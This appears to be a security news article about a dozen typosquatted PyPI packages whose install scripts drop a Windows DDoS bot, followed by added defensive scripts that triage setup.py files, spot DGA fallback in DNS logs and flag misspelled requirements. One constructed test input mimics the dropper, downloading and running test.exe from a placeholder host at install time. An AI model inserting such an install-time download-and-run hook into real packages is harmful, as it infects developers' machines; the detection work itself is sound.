A dozen malicious Python packages were uploaded to the PyPI repository this weekend in a typosquatting campaign whose payload performs DDoS attacks on a Counter-Strike 1.6 server.
The Python Package Index (PyPI) is a repository of open-source software packages that developers can incorporate into their Python projects to build complex applications with minimal effort.
However, because anyone can upload packages to the repository, and packages are removed only after they are reported as malicious, PyPI is increasingly abused by threat actors to steal developer credentials or deploy malware.
A malicious typosquatting campaign
This weekend, researchers at Checkmarx discovered that a user named “devfather777” had published 12 packages with names similar to those of popular packages, to trick developers into installing the malicious versions instead.
Typosquatting attacks rely on developers mistakenly installing a malicious package whose name resembles a legitimate one. For example, some of the packages in this campaign and their legitimate counterparts (in parentheses) are Gesnim (Gensim), TensorFolw (TensorFlow), and ipaddres (ipaddress).
The complete list of uploaded malicious PyPI packages is:
Because developers usually fetch these packages from the terminal, it is easy to type a package name with two letters transposed or one letter missing. Since the download and build proceed as expected, the victim does not notice the mistake and the device is infected.
Although Checkmarx reported the packages to PyPI, they remained online at the time of writing.
Targeting Counter-Strike servers
When a developer installs one of these packages, code embedded in its setup.py runs during installation (before the package is ever imported), checks that the host is a Windows system and, if it is, downloads a payload (test.exe) from GitHub.
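Because setup.py is ordinary Python that pip executes during installation, the install-time behaviour described above (an OS check, a remote download, a process launch) can be looked for statically before anything is installed. The script below is an added example written for this article; it is not code from the article, from Checkmarx, or from the reported packages. The two setup.py inputs are constructed: one is a normal build script, the other mimics the described pattern with a placeholder URL, and the lists of call names it matches are an assumption about what a legitimate build script normally does not need.

```python
"""Static triage of a setup.py before installing an sdist.

Added example for this article, not code from the article, Checkmarx or the
reported packages. It flags the install-time behaviour the article describes
(host-OS check, remote download, process launch) and custom install commands
(cmdclass / install subclasses), which are the hook that runs such code
during `pip install`.
"""
import ast

# Dotted call names that are unusual in a legitimate build script (assumed lists).
OS_CHECK_CALLS = {"platform.system", "platform.platform", "sys.getwindowsversion"}
OS_CHECK_ATTRS = {"sys.platform", "os.name"}
DOWNLOAD_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                  "urlopen", "urlretrieve", "requests.get", "requests.post"}
EXEC_CALLS = {"os.system", "os.popen", "os.startfile", "subprocess.run",
              "subprocess.call", "subprocess.Popen", "subprocess.check_output",
              "exec", "eval"}
# setuptools command classes whose subclasses execute at install/build time.
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py"}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage_setup_py(source):
    """Map finding category -> sorted line numbers where it occurs in setup.py."""
    findings = {"os_check": [], "download": [], "exec": [], "install_hook": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in OS_CHECK_CALLS:
                findings["os_check"].append(node.lineno)
            elif name in DOWNLOAD_CALLS:
                findings["download"].append(node.lineno)
            elif name in EXEC_CALLS:
                findings["exec"].append(node.lineno)
            elif name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings["install_hook"].append(node.lineno)
        elif isinstance(node, ast.Attribute) and _dotted(node) in OS_CHECK_ATTRS:
            findings["os_check"].append(node.lineno)
        elif isinstance(node, ast.ClassDef):
            # Subclassing install/develop/... means run() executes under pip.
            bases = {(_dotted(b) or "").split(".")[-1] for b in node.bases}
            if bases & INSTALL_COMMANDS:
                findings["install_hook"].append(node.lineno)
    return {k: sorted(v) for k, v in findings.items()}


def verdict(findings):
    """'suspicious' when a download is paired with execution or an install hook."""
    hits = {k for k, v in findings.items() if v}
    if "download" in hits and hits & {"exec", "install_hook"}:
        return "suspicious"
    return "review" if hits else "clean"


# Constructed inputs: a normal build script, and one mimicking the described
# dropper pattern (not the reported packages' code; the URL is a placeholder).
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="demo", version="1.0", packages=find_packages())
'''

SUSPICIOUS_SETUP = '''
import platform, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        if platform.system() == "Windows":
            urllib.request.urlretrieve("https://example.invalid/test.exe", "test.exe")
            subprocess.Popen(["test.exe"])

setup(name="demo", version="1.0", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, verdict(triage_setup_py(src)), triage_setup_py(src))
```

Fetch the sdist archive by hand from the project's file listing on PyPI rather than with pip, since pip may execute setup.py to generate metadata even for a plain download, then run the triage over the extracted setup.py. Legitimate packages also subclass install commands, so a "review" verdict is a prompt to read the file, not a conviction.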
At the time of analysis only 11 of the 69 antivirus engines on VirusTotal flagged the file as malicious, suggesting a relatively new or well-evaded sample. The malware is written in C++.
The malware installs itself and creates a Startup entry to persist across reboots, and it also adds an expired root certificate to the system-wide certificate store.
Next, it connects to a hardcoded URL to retrieve its configuration. If that still fails on the third attempt, it falls back to sending HTTP requests to addresses produced by a DGA (domain generation algorithm) and waits for one of them to answer.
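The fallback described above leaves a trace that does not depend on knowing the algorithm: once the hardcoded address fails, the host starts resolving a burst of random-looking names, most of which do not exist. The script below is an added example of hunting for that pattern in resolver logs; it is not Checkmarx's code and does not implement the malware's actual generator, which the article does not describe. The log lines are constructed, and the entropy and vowel-ratio thresholds are assumptions to tune on local traffic.

```python
"""Detect a DGA-style fallback burst in DNS resolver logs.

Added example for this article (not Checkmarx's code, not the malware's
generator). Flags clients that receive several NXDOMAIN answers for
high-entropy, vowel-poor names within a short window.
"""
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def registered_label(qname):
    """Second-level label of a query name ('qx7k...' from 'qx7k....com').
    Simplification (assumption): a real detector should use the public suffix list."""
    parts = qname.rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def looks_generated(label, min_entropy=3.0, max_vowel_ratio=0.2):
    """Heuristic: long, high-entropy, vowel-poor labels are typical of DGA output.
    Thresholds are assumptions; dictionary-based DGAs need a different test."""
    label = label.lower()
    if len(label) < 8:
        return False
    vowels = sum(label.count(v) for v in "aeiou")
    return shannon_entropy(label) >= min_entropy and vowels / len(label) <= max_vowel_ratio


def find_dga_bursts(log_text, min_nx=4, window=60):
    """Return {client: [qnames]} for clients with >= min_nx NXDOMAIN answers
    for generated-looking names inside any `window`-second interval."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        ts, client, qname, rcode = line.split()
        if rcode == "NXDOMAIN" and looks_generated(registered_label(qname)):
            per_client[client].append((int(ts), qname))
    flagged = {}
    for client, events in per_client.items():
        events.sort()
        start = 0
        for end in range(len(events)):          # sliding window over timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= min_nx:
                flagged[client] = [q for _, q in events]
                break
    return flagged


# Constructed resolver log: "<epoch> <client> <qname> <rcode>". Host 10.0.0.7
# retries a fixed name, then (as the article describes) falls back to generated names.
SAMPLE_LOG = """\
1660500000 10.0.0.5 pypi.org NOERROR
1660500001 10.0.0.5 github.com NOERROR
1660500002 10.0.0.7 update-service.example NOERROR
1660500003 10.0.0.7 update-service.example NOERROR
1660500004 10.0.0.7 update-service.example NOERROR
1660500005 10.0.0.7 qx7kz2bv9mtp.com NXDOMAIN
1660500006 10.0.0.7 lw3hd8rfy0na.com NXDOMAIN
1660500007 10.0.0.7 zt4mp9ca1xqe.net NXDOMAIN
1660500008 10.0.0.7 b2ns6vrk8dgl.com NXDOMAIN
1660500009 10.0.0.7 rk0vd5hz3wqy.org NXDOMAIN
1660500010 10.0.0.5 files.pythonhosted.org NOERROR
"""

if __name__ == "__main__":
    for client, names in find_dga_bursts(SAMPLE_LOG).items():
        print(client, "->", names)
```

Entropy alone is a weak signal: a long ordinary name such as update-service scores above 3 bits, which is why the vowel ratio and the NXDOMAIN requirement are combined with it. The three failed attempts at the hardcoded address that precede the burst are visible in the same log and make a useful secondary pivot.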
“This is the first time we see a malware (strain) in the software supply chain ecosystem using DGA or, in this case, UGA to allocate a generated name for new instructions for the malicious campaign,” Checkmarx comments in the report.
In the case observed by the analysts, the configuration instructed the malware to enlist the host in a DDoS botnet that began sending traffic to a Russian Counter-Strike 1.6 server.
The goal appears to be to take down the Counter-Strike server by infecting enough devices that their combined traffic overwhelms it.
The GitHub repository used to host the malware has been taken down, but the threat actor could resume the operation by abusing a different file hosting service.
If you installed Python packages this weekend and may have mistyped a name, scrutinize your projects and double-check that every dependency resolves to the legitimate package and not to one of the 12 malicious ones.
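The mechanism described earlier (one transposed or dropped letter in a package name) and the advice to double-check your dependencies come down to the same check: compare every requirement against the names you actually meant to install. The script below is an added example, not code from the article or from Checkmarx. The allowlist and the requirements file are constructed (the allowlist would normally be your lockfile or an organisation-wide list), names are normalised the way PyPI compares them, and the distance used is optimal string alignment so that a swapped letter pair counts as a single edit.

```python
"""Flag requirements that are a near-miss of a package you meant to install.

Added example for this article, not the article's or Checkmarx's code. Names are
normalised per PEP 503 and compared with optimal string alignment distance, so
'gesnim' is one edit from 'gensim' and 'tensorfolw' one edit from 'tensorflow'.
"""
import re


def normalize(name):
    """PEP 503 normalisation: case-insensitive, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a, b):
    """Optimal string alignment distance: insert/delete/substitute plus
    adjacent transposition, each costing 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition
    return d[len(a)][len(b)]


def requirement_name(line):
    """Project name from a requirements.txt line; specifiers, extras and markers are dropped."""
    return re.split(r"[\s\[<>=!~;@]", line.strip(), maxsplit=1)[0]


def check_requirements(req_text, allowlist, max_distance=2):
    """Return [(requested, closest_allowed, distance)] for names that are not on
    the allowlist but lie within max_distance edits of an allowed name."""
    allowed = {normalize(n) for n in allowlist}
    findings = []
    for line in req_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("-"):
            continue                      # comments and pip options (-r, --index-url)
        name = normalize(requirement_name(line))
        if name in allowed:
            continue
        dist, closest = min((osa_distance(name, a), a) for a in allowed)
        if dist <= max_distance:
            findings.append((name, closest, dist))
    return findings


# Constructed allowlist and requirements file; the three typos are the ones
# named in the article. Use your own lockfile or organisation list in practice.
ALLOWLIST = ["gensim", "tensorflow", "ipaddress", "numpy", "requests", "pandas"]
REQUIREMENTS = """\
# constructed requirements.txt
numpy>=1.23
Gesnim==4.2.0
tensorfolw>=2.9
requests[security]
ipaddres
pandas
"""

if __name__ == "__main__":
    for requested, closest, dist in check_requirements(REQUIREMENTS, ALLOWLIST):
        print(f"{requested!r} is {dist} edit(s) from {closest!r}: check before installing")
```

The check is deliberately narrow: it only reports names that are close to something you already trust, so a wholly unfamiliar package passes silently and still needs the usual review. Running it as a pre-commit hook over requirements files, or over `pip freeze` output after the fact, covers both the prevention and the clean-up the article recommends.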